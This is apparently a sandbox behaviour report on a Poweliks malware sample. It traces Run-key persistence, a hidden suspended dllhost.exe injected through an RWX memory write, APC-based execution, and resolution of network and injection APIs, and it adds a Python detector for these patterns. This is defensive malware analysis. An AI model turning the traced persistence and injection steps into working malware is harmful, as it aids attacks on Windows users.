Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\syswow64\windowspowershell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Windows\system32 type = file_attributes True 7
Fn
Get Info C:\Windows type = file_attributes True 4
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Write CONOUT$ size = 1 True 1
Write CONOUT$ size = 2 True 1
Registry (189)
Operation Key Additional Information Success Count
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Open Key HKEY_CURRENT_USER\Environment True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 9
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 (2 identical entries)
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 (2 identical entries, heading the third and fourth pass below)
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\{Application, HardwareEvents, Internet Explorer, Key Management Service, Media Center, OAlerts, System, Windows PowerShell, Windows PowerShell\PowerShell} True 1 (three further passes over the same nine keys, 27 entries)
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1 (2 identical entries)
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1 (2 identical entries)
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2 (2 identical entries)
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2 (2 identical entries)
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 9
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1 (2 identical entries)
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1 (2 identical entries)
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = f, data = 0 False 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 (9 identical entries)
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 (18 identical entries)
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 (4 identical entries)
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 (2 identical entries)
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 (2 identical entries)
Note: the data = 0 rows are the size-probe calls that precede each real read of the same value. The repeated walk over HKLM\SYSTEM\CurrentControlSet\Services\EventLog, probing a PowerShell subkey under every registered log (and failing on Security), is the .NET event-log source lookup that the PowerShell host runs at start-up; it is host noise, not malware activity. The rows that matter for Poweliks are the two Create Key calls on the HKCU Run key at the top and the failed read of value f under it: the value is queried before it exists at this point of the trace, and the same process later resolves ZwSetValueKey and RegSetValueExW (see the Module table below).
Process (1)
Operation Process Additional Information Success Count
Create C:\Windows\syswow64\dllhost.exe os_pid = 0x220, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Thread (2)
Operation Process Additional Information Success Count
Queue APC c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0x174 True 1
Resume c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0x174 True 1
Memory (2)
Operation Process Additional Information Success Count
Allocate C:\Windows\syswow64\dllhost.exe address = 0x60000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15108 True 1
Write C:\Windows\syswow64\dllhost.exe address = 0x60000, size = 15108 True 1
Note: read the three tables together. dllhost.exe (PID 0x220) is created suspended and hidden, a 15108-byte RWX region is allocated at 0x60000 in it and written in one go; that region is still visible in Process #7's region list below as private_0x0000000000060000 (0x00060000-0x00063fff, Readable, Writable, Executable, not image-backed). The Queue APC and Resume rows, by contrast, target thread 0x174 of powershell.exe itself, not the new dllhost.exe, so the trace shows two separate execution tricks in one process.
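The Process, Thread and Memory rows above are the raw record of a suspended-process injection, but in a sandbox export they are three separate tables. The Python below is an added example, not part of the VMRay report and not Poweliks code: it parses rows in the report's own column order (the sample rows are constructed after the rows above, not copied from them, and the notepad.exe row is an invented benign control), then raises a finding per target process once the stages line up. Keying on the target process is what separates the dllhost.exe chain (create suspended, RWX allocation, write into that same region) from the APC-queue-and-resume pair that hits powershell.exe's own thread 0x174; a detector that demanded all five stages on one process would miss both.

```python
import re
from dataclasses import dataclass, field

# Constructed sample rows, modelled on the Process, Thread and Memory rows of the
# powershell.exe log above (not a verbatim copy of the report). Column order is the
# report's: <operation> <target process> <additional information> <success> <count>.
# The notepad.exe row is invented as a benign control and is not in the report.
SAMPLE_LOG = [
    r"Create C:\Windows\syswow64\dllhost.exe os_pid = 0x220, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1",
    r"Allocate C:\Windows\syswow64\dllhost.exe address = 0x60000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15108 True 1",
    r"Write C:\Windows\syswow64\dllhost.exe address = 0x60000, size = 15108 True 1",
    r"Queue APC c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0x174 True 1",
    r"Resume c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0x174 True 1",
    r"Allocate C:\Windows\syswow64\notepad.exe address = 0x70000, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 4096 True 1",
    "Fn",  # link residue as it appears in the scraped report; must be ignored
]

ROW = re.compile(r"^(Create|Allocate|Write|Queue APC|Resume)\s+(\S+)\s+(.*?)\s+(True|False)\s+(\d+)$")
ADDR = re.compile(r"address = (0x[0-9a-fA-F]+)")
SIZE = re.compile(r"size = (\d+)")


@dataclass
class Finding:
    target: str
    stages: set = field(default_factory=set)
    rwx_regions: list = field(default_factory=list)  # (base, size) allocated RWX in the target
    verdicts: list = field(default_factory=list)


def parse_row(line):
    """Split one report row into its columns; None for residue such as 'Fn' or 'Data'."""
    m = ROW.match(line.strip())
    if not m:
        return None
    op, target, details, success, count = m.groups()
    return {"op": op, "target": target.lower(), "details": details,
            "success": success == "True", "count": int(count)}


def analyze(lines):
    """Return {target: Finding} for every target that shows at least one injection stage."""
    findings = {}
    for line in lines:
        row = parse_row(line)
        if row is None or not row["success"]:
            continue  # unparsed rows and failed calls carry no injection evidence
        f = findings.setdefault(row["target"], Finding(row["target"]))
        op, d = row["op"], row["details"]
        if op == "Create" and "CREATE_SUSPENDED" in d:
            f.stages.add("create_suspended")
        elif op == "Allocate" and "PAGE_EXECUTE_READWRITE" in d:
            f.stages.add("alloc_rwx")
            a, s = ADDR.search(d), SIZE.search(d)
            if a and s:
                f.rwx_regions.append((int(a.group(1), 16), int(s.group(1))))
        elif op == "Write":
            a = ADDR.search(d)
            addr = int(a.group(1), 16) if a else None
            # A write that lands inside a region this same actor made RWX is the strong signal.
            hit = addr is not None and any(b <= addr < b + n for b, n in f.rwx_regions)
            f.stages.add("write_into_rwx" if hit else "write_remote")
        elif op == "Queue APC":
            f.stages.add("queue_apc")
        elif op == "Resume":
            f.stages.add("resume")
    for f in findings.values():
        if {"create_suspended", "alloc_rwx", "write_into_rwx"} <= f.stages:
            f.verdicts.append("suspended-process injection: RWX region allocated and written before the target ran")
        if {"queue_apc", "resume"} <= f.stages:
            f.verdicts.append("APC-triggered execution: APC queued, then thread resumed")
    return {t: f for t, f in findings.items() if f.stages}


if __name__ == "__main__":
    for target, f in analyze(SAMPLE_LOG).items():
        print(target, sorted(f.stages), f.verdicts)
```

Feed it the Process, Thread and Memory rows of any process in such a report; a benign process that merely allocates PAGE_READWRITE memory produces no finding, and a failed call (Success False) never contributes a stage.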
Module (108)
Operation Module Additional Information Success Count
Load KERNEL32.DLL base_address = 0x76f00000 True 1
Load ntdll.dll base_address = 0x77c60000 True 1
Load WS2_32.dll base_address = 0x75820000 True 1
Load SHLWAPI.dll base_address = 0x776e0000 True 1
Load WININET.dll base_address = 0x77370000 True 1
Load RPCRT4.dll base_address = 0x76bf0000 True 1
Load imagehlp.dll base_address = 0x76b00000 True 1
Load USERENV.dll base_address = 0x75710000 True 1
Load ADVAPI32.dll base_address = 0x76b50000 True 1
Load ole32.dll base_address = 0x77210000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76f00000 True 3
Get Handle c:\windows\syswow64\user32.dll base_address = 0x75ba0000 True 1
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77c60000 True 1
Get Handle WS2_32.dll base_address = 0x75820000 True 1
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x776e0000 True 1
Get Handle WININET.dll base_address = 0x77370000 True 1
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x76bf0000 True 1
Get Handle imagehlp.dll base_address = 0x76b00000 True 1
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x75710000 True 1
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76b50000 True 1
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x77210000 True 1
Get Handle c:\windows\syswow64\windowspowershell\v1.0\powershell.exe base_address = 0x21a70000 True 1
Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 2048 True 1
Get Filename c:\windows\syswow64\windowspowershell\v1.0\powershell.exe process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76f1435f True 1
Get Address c:\windows\syswow64\user32.dll function = CallWindowProcA, address_out = 0x75bc792f True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76f11856 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76f11245 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76f11222 True 2
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x77cad2f3 True 2
Get Address Unknown module name (address lies in WS2_32.dll, 0x75820000-0x75854fff) function = 16 (import by ordinal; WS2_32 ordinal 16 is recv), address_out = 0x75826b0e True 2
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7770c45b True 2
Get Address Unknown module name (address lies in WININET.dll, loaded at 0x77370000) function = InternetCrackUrlA, address_out = 0x7737d075 True 2
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x76c17c12 True 2
Get Address Unknown module name (address lies in imagehlp.dll, 0x76b00000-0x76b29fff) function = CheckSumMappedFile, address_out = 0x76b08303 True 2
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x75711a7a True 2
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76b6469d True 2
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7722b636 True 2
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x77d354a7 True 1
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x77cd5c30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x77c801b4 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x77c7fa98 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x77c7ff14 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x77c7fb30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x77d298c3 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77d34760 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x77cd9d88 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77c93164 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x77c9ad68 True 1
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x77c8df20 True 1
Get Address Unknown module name (WS2_32.dll) function = 115 (ordinal; WSAStartup), address_out = 0x75823ab2 True 1
Get Address Unknown module name (WS2_32.dll) function = 3 (ordinal; closesocket), address_out = 0x75823918 True 1
Get Address Unknown module name (WS2_32.dll) function = 19 (ordinal; send), address_out = 0x75826f01 True 1
Get Address Unknown module name (WS2_32.dll) function = 4 (ordinal; connect), address_out = 0x75826bdd True 1
Get Address Unknown module name (WS2_32.dll) function = 52 (ordinal; gethostbyname), address_out = 0x75837673 True 1
Get Address Unknown module name (WS2_32.dll) function = 23 (ordinal; socket), address_out = 0x75823eb8 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7770ecc7 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x776f00aa True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x776ed11c True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x776ec5e6 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x776ed250 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x77cbd598 (resolved address lies in ntdll.dll's range, i.e. a forwarded export) True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76f17a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76f114b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x76f1328c True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x76f17a2f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76f92c21 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76f11282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76f153c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x76f39d3f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x76f3276c True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76f110ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76f2d802 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x76f2d5b5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76f11136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x76f143ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x76f2d9e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x76f2d9b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76f11072 True 1
